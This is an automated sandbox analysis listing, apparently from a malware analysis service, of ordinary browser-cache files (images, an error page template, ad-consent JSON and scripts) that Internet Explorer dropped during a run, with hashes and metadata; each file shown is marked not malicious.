                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):750
                                                                                                                                                                                                                                  Entropy (8bit):7.653501615166515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
                                                                                                                                                                                                                                  MD5:93D77F5C5FFACEBA12A1ABFC6190B947
                                                                                                                                                                                                                                  SHA1:8001474A7342EBF760C66F1C30E48E32E00F2AF3
                                                                                                                                                                                                                                  SHA-256:E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
                                                                                                                                                                                                                                  SHA-512:D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgJnJ[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11532
                                                                                                                                                                                                                                  Entropy (8bit):7.851516433481847
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2JEDuAiMDafoxvWYzzawyHZvxczunLlArDYUbG272hGfc9wBuKEPlxP:NJLAgT8AZWzuLleYr3GfcfK4lxP
                                                                                                                                                                                                                                  MD5:583AD5872841584F57A8D272DBEF1F75
                                                                                                                                                                                                                                  SHA1:7DCEA6EC88FC3091D5F9B6591C461ED9412307B3
                                                                                                                                                                                                                                  SHA-256:DA23C9C4E4ACB95DB36BFF69DEEDF8152B63A84E932D3B17DC63B2D01B885765
                                                                                                                                                                                                                                  SHA-512:709ABC7640C2D509E36B9A428DB8B3DE2247A64AD0AA06704865343046C4A0309C6E4B9808274DDD84911D0B3FC2ACCAF3E7892A224E348D027AF88A99F08F97
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgjXB[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7496
                                                                                                                                                                                                                                  Entropy (8bit):7.872783514358589
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qn4PY809lw6ix9juWbyzWHyqQVnqWHLtYJ1xkl6d:0ovVxwWbryqQVnqWHG1H
                                                                                                                                                                                                                                  MD5:60C730BB16740319B2A30E9F11BE67E0
                                                                                                                                                                                                                                  SHA1:74B35979046B1B152F7A9877CAD81CC64E120C0A
                                                                                                                                                                                                                                  SHA-256:CC70CEABB3BE619DD85D82AEA0D3294FDD96093D467B394FE17FE4761E013721
                                                                                                                                                                                                                                  SHA-512:5C3682AF6548F8E2355AEF64D4F9DB864DE73BCD0331AFAFCFC4B5EE4B0B2A5BBBC806DAAC80F10667E97CE7FA9807076E769870310C19ADE9ED5BDA75E920CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgmIX[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12089
                                                                                                                                                                                                                                  Entropy (8bit):7.904789531773816
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QtIaSD1Y9EN+brlhrr8hJ+sDbecdnERkmMtGLhsDmZrgnbLGKnVDXZJ/29qtJXmq:+IaSD1XEbYn+sDbecy/MtGLhrdWdX/2A
                                                                                                                                                                                                                                  MD5:545034BC80A1AACF34CC4EDC5C66F0F4
                                                                                                                                                                                                                                  SHA1:AB11903457FF4F7CCF18CD685EF33CD037BF1965
                                                                                                                                                                                                                                  SHA-256:AE3C9594D1A49BB4B2F04659BF6131D989BE980275C1E12DF7683A2FE804E4B9
                                                                                                                                                                                                                                  SHA-512:EBA05B272F6FF630B31551EC7508B470F18B1817B30988D74B1A80FB4C5BA220E153CBED4E9BE5FC6638B26178E80934F1A2872F69898FB33B916D86CB54E8FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgpXv[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15626
                                                                                                                                                                                                                                  Entropy (8bit):7.962500897509523
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                                                                                                                                                                                                                  MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                                                                                                                                                                                                                  SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                                                                                                                                                                                                                  SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                                                                                                                                                                                                                  SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgs0a[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13020
                                                                                                                                                                                                                                  Entropy (8bit):7.879416972104943
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                                                                                                                                                                                                                  MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                                                                                                                                                                                                                  SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                                                                                                                                                                                                                  SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                                                                                                                                                                                                                  SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgtUM[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9977
                                                                                                                                                                                                                                  Entropy (8bit):7.946009698326732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:QoT3vwOvtbiYeKdklm6R3rK0Ht9xS3S4wNvFkBvPopCO/Jv:bToO9dko6rJHDxw+vF6O1
                                                                                                                                                                                                                                  MD5:52FD0C986FE86FA1B95FC4CAF4F18A64
                                                                                                                                                                                                                                  SHA1:BA32E32160A537405CF661194D78BF627AD57295
                                                                                                                                                                                                                                  SHA-256:048CA77D1369A0EC826C5D8F108E052E818A99BD847DAD375DB04D330EA20115
                                                                                                                                                                                                                                  SHA-512:C3AD8FABA1A7292A460582FC2CFA06BDFA0D9949AE43E7CFB5CD7CB93AE422C18230BE86044664D4B0308833761D1C79C9D8EBC77E1E39CADDA3742A676A6085
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgumt[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12102
                                                                                                                                                                                                                                  Entropy (8bit):7.83903065961955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q259xLWdPUGydsUzuizxcSo5s3N3QStlw12PJd0dymT+QMe3RmFM1iCXJsR2:N7xEPUGgzuizxAs3NAStuwJmsm6Q6F2
                                                                                                                                                                                                                                  MD5:6C482BFC9BCC034E5552DAF300C6433B
                                                                                                                                                                                                                                  SHA1:8D06F42B3A9D940A2D52CDD464EC2E66649802C5
                                                                                                                                                                                                                                  SHA-256:A5A1B76BF9BAE3CA8B2B5D8EDFA17EC093979C33AEC7FBF4E356803C891762D9
                                                                                                                                                                                                                                  SHA-512:6808BD613190107D795D016200C0186650CF51AFC5BE84F8FD05219810B817406EDD6D9CF9F6BA6F6C2D6F6F33069A09B4464CFC1401739E1F5E69B0648FDCE7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAOgvnc[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13697
                                                                                                                                                                                                                                  Entropy (8bit):7.848115090089445
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Q2W3xN4uVWuPUZ3taz4XwR6SrWyBOvf/MWnxdmYpCgco83DCFxPoCOS1YAOHJpwt:NW3xN4u8yUZ3Iz4XwR/mmn2FxP4AO0zX
                                                                                                                                                                                                                                  MD5:F4EFBC68289CAF3A7B9073AF2E9E0BD1
                                                                                                                                                                                                                                  SHA1:46C041D8BBC0AF52E388432795B49D050E7A0A43
                                                                                                                                                                                                                                  SHA-256:4EB34F73471CABFCBC78439D42AF69831807D25F5ACD8151559BED13139D8DE1
                                                                                                                                                                                                                                  SHA-512:BE7E716E94EF3FC30C33D62EE15851E0F7CF635197901C088446AEB3F2B1BF8CC20F7D5B4C2F055A478EB3E622ABE981C0CC3754C0B144E485D5ADC79D0B36A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BB6Ma4a[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):368
                                                                                                                                                                                                                                  Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                                  MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                                  SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                                  SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                                  SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBXXVfm[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):842
                                                                                                                                                                                                                                  Entropy (8bit):7.712790381238881
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                                                                                                                                                                                                  MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                                                                                                                                                                                                  SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                                                                                                                                                                                                  SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                                                                                                                                                                                                  SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\BBZ3zrM[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):763
                                                                                                                                                                                                                                  Entropy (8bit):7.621723844116318
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7N5fvaQCJmEzDuMi5ld08fuKGi9o4eUTE5xDgic9NEm652PPanadeh7jteQ8c:IBihmEGMi5ltfDPu4E5iic9NEp52kl9
                                                                                                                                                                                                                                  MD5:CFE739AEAE33DC7C7BB02D24E081F0CE
                                                                                                                                                                                                                                  SHA1:CBE000F23A34635EF4518C919A234DC4A3635C1E
                                                                                                                                                                                                                                  SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                                                                                                                                                                                                                  SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\NewErrorPageTemplate[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1612
                                                                                                                                                                                                                                  Entropy (8bit):4.869554560514657
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                                                                  MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                                                                  SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                                                                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                                                                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\auction[1].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13490
                                                                                                                                                                                                                                  Entropy (8bit):5.8925613461298845
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YRSpjCOThNudaKmhgLOCE7p3dskCtXWbE:Y7OTn6GgL52bCUQ
                                                                                                                                                                                                                                  MD5:2165BE8BA90A281C7F91B2D924C7DBE6
                                                                                                                                                                                                                                  SHA1:CDB8261D85BEF693AED8871B8877AEBE3A08811B
                                                                                                                                                                                                                                  SHA-256:A7852889DF4235E53E32FA6025EA157E66CD31AAF1FD7A31F5472317FE1F33B6
                                                                                                                                                                                                                                  SHA-512:84EC343E21D5C4C90264585438D1A0BC5519E1333C665A6A294792793BD7732EC6FAF010F614C5CED70C2CC46888CB2522B927BD5B0851E0F5C83C52366161B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\down[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):748
                                                                                                                                                                                                                                  Entropy (8bit):7.249606135668305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                                                                  MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                                                                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                                                                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                                                                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\e151e5[1].gif
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                  Entropy (8bit):3.122191481864228
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:CUTxls/1h/:7lU/
                                                                                                                                                                                                                                  MD5:F8614595FBA50D96389708A4135776E4
                                                                                                                                                                                                                                  SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                                                                                                                                                                                                  SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                                                                                                                                                                                                  SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\favicon[2].ico
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1078
                                                                                                                                                                                                                                  Entropy (8bit):1.240940859118772
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                                                                                                                                                                                  MD5:4123CE1E1732F202F60292941FF1487D
                                                                                                                                                                                                                                  SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                                                                                                                                                                                  SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                                                                                                                                                                                  SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\http___cdn.taboola.com_libtrc_static_thumbnails_26b7c43e8735f7408c60e41fb7e91ecd[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15272
                                                                                                                                                                                                                                  Entropy (8bit):7.746669724171038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+hq4/wYNg7d8qq/uRzBpSPnDyOfia52jvHa:EoYyp8qvGaaE7a
                                                                                                                                                                                                                                  MD5:3D15488C4E13B562DF2958C9C5DFBC8A
                                                                                                                                                                                                                                  SHA1:6EB1FFA4BFC5AC5D1EF77333787957DC73879D16
                                                                                                                                                                                                                                  SHA-256:92C55F09D5705690AA849771A368CB4F1B0EAB9ACCFFA8E62FD9A1C28168EB97
                                                                                                                                                                                                                                  SHA-512:A48C0A9CBA3BB5A1A10991D8C446794BA4F5D87FDB628D3DEAADCAE52191616C782B09C10144CCA47EAE70CF78CD0B2C5A5C4A74376080A666E3155648F88CAB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\iab2Data[1].json
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):242382
                                                                                                                                                                                                                                  Entropy (8bit):5.1486574437549235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
                                                                                                                                                                                                                                  MD5:D76FFE379391B1C7EE0773A842843B7E
                                                                                                                                                                                                                                  SHA1:772ED93B31A368AE8548D22E72DDE24BB6E3855C
                                                                                                                                                                                                                                  SHA-256:D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
                                                                                                                                                                                                                                  SHA-512:23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\otTCF-ie[2].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):102879
                                                                                                                                                                                                                                  Entropy (8bit):5.311489377663803
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
                                                                                                                                                                                                                                  MD5:52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
                                                                                                                                                                                                                                  SHA1:D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
                                                                                                                                                                                                                                  SHA-256:E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
                                                                                                                                                                                                                                  SHA-512:DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF00EAE8B2B5B8F5FB.TMP
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39801
                                                                                                                                                                                                                                  Entropy (8bit):0.604028759226281
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:kBqoxKAuvScS+2x2v2iY2ip2iy2igIilfVecZIilfVec5IilfVec+:kBqoxKAuqR+w2st2MnfA2nfAynfAj
                                                                                                                                                                                                                                  MD5:05B752A80C1C49B3521BA75381A7D168
                                                                                                                                                                                                                                  SHA1:873A1B8290FC661274A72A4C16FFE00712305BFC
                                                                                                                                                                                                                                  SHA-256:EA095D8EFA9F8E5607F8A2BFAA0CB9F2D33B068B93B88D6422E23A7AFE17DC02
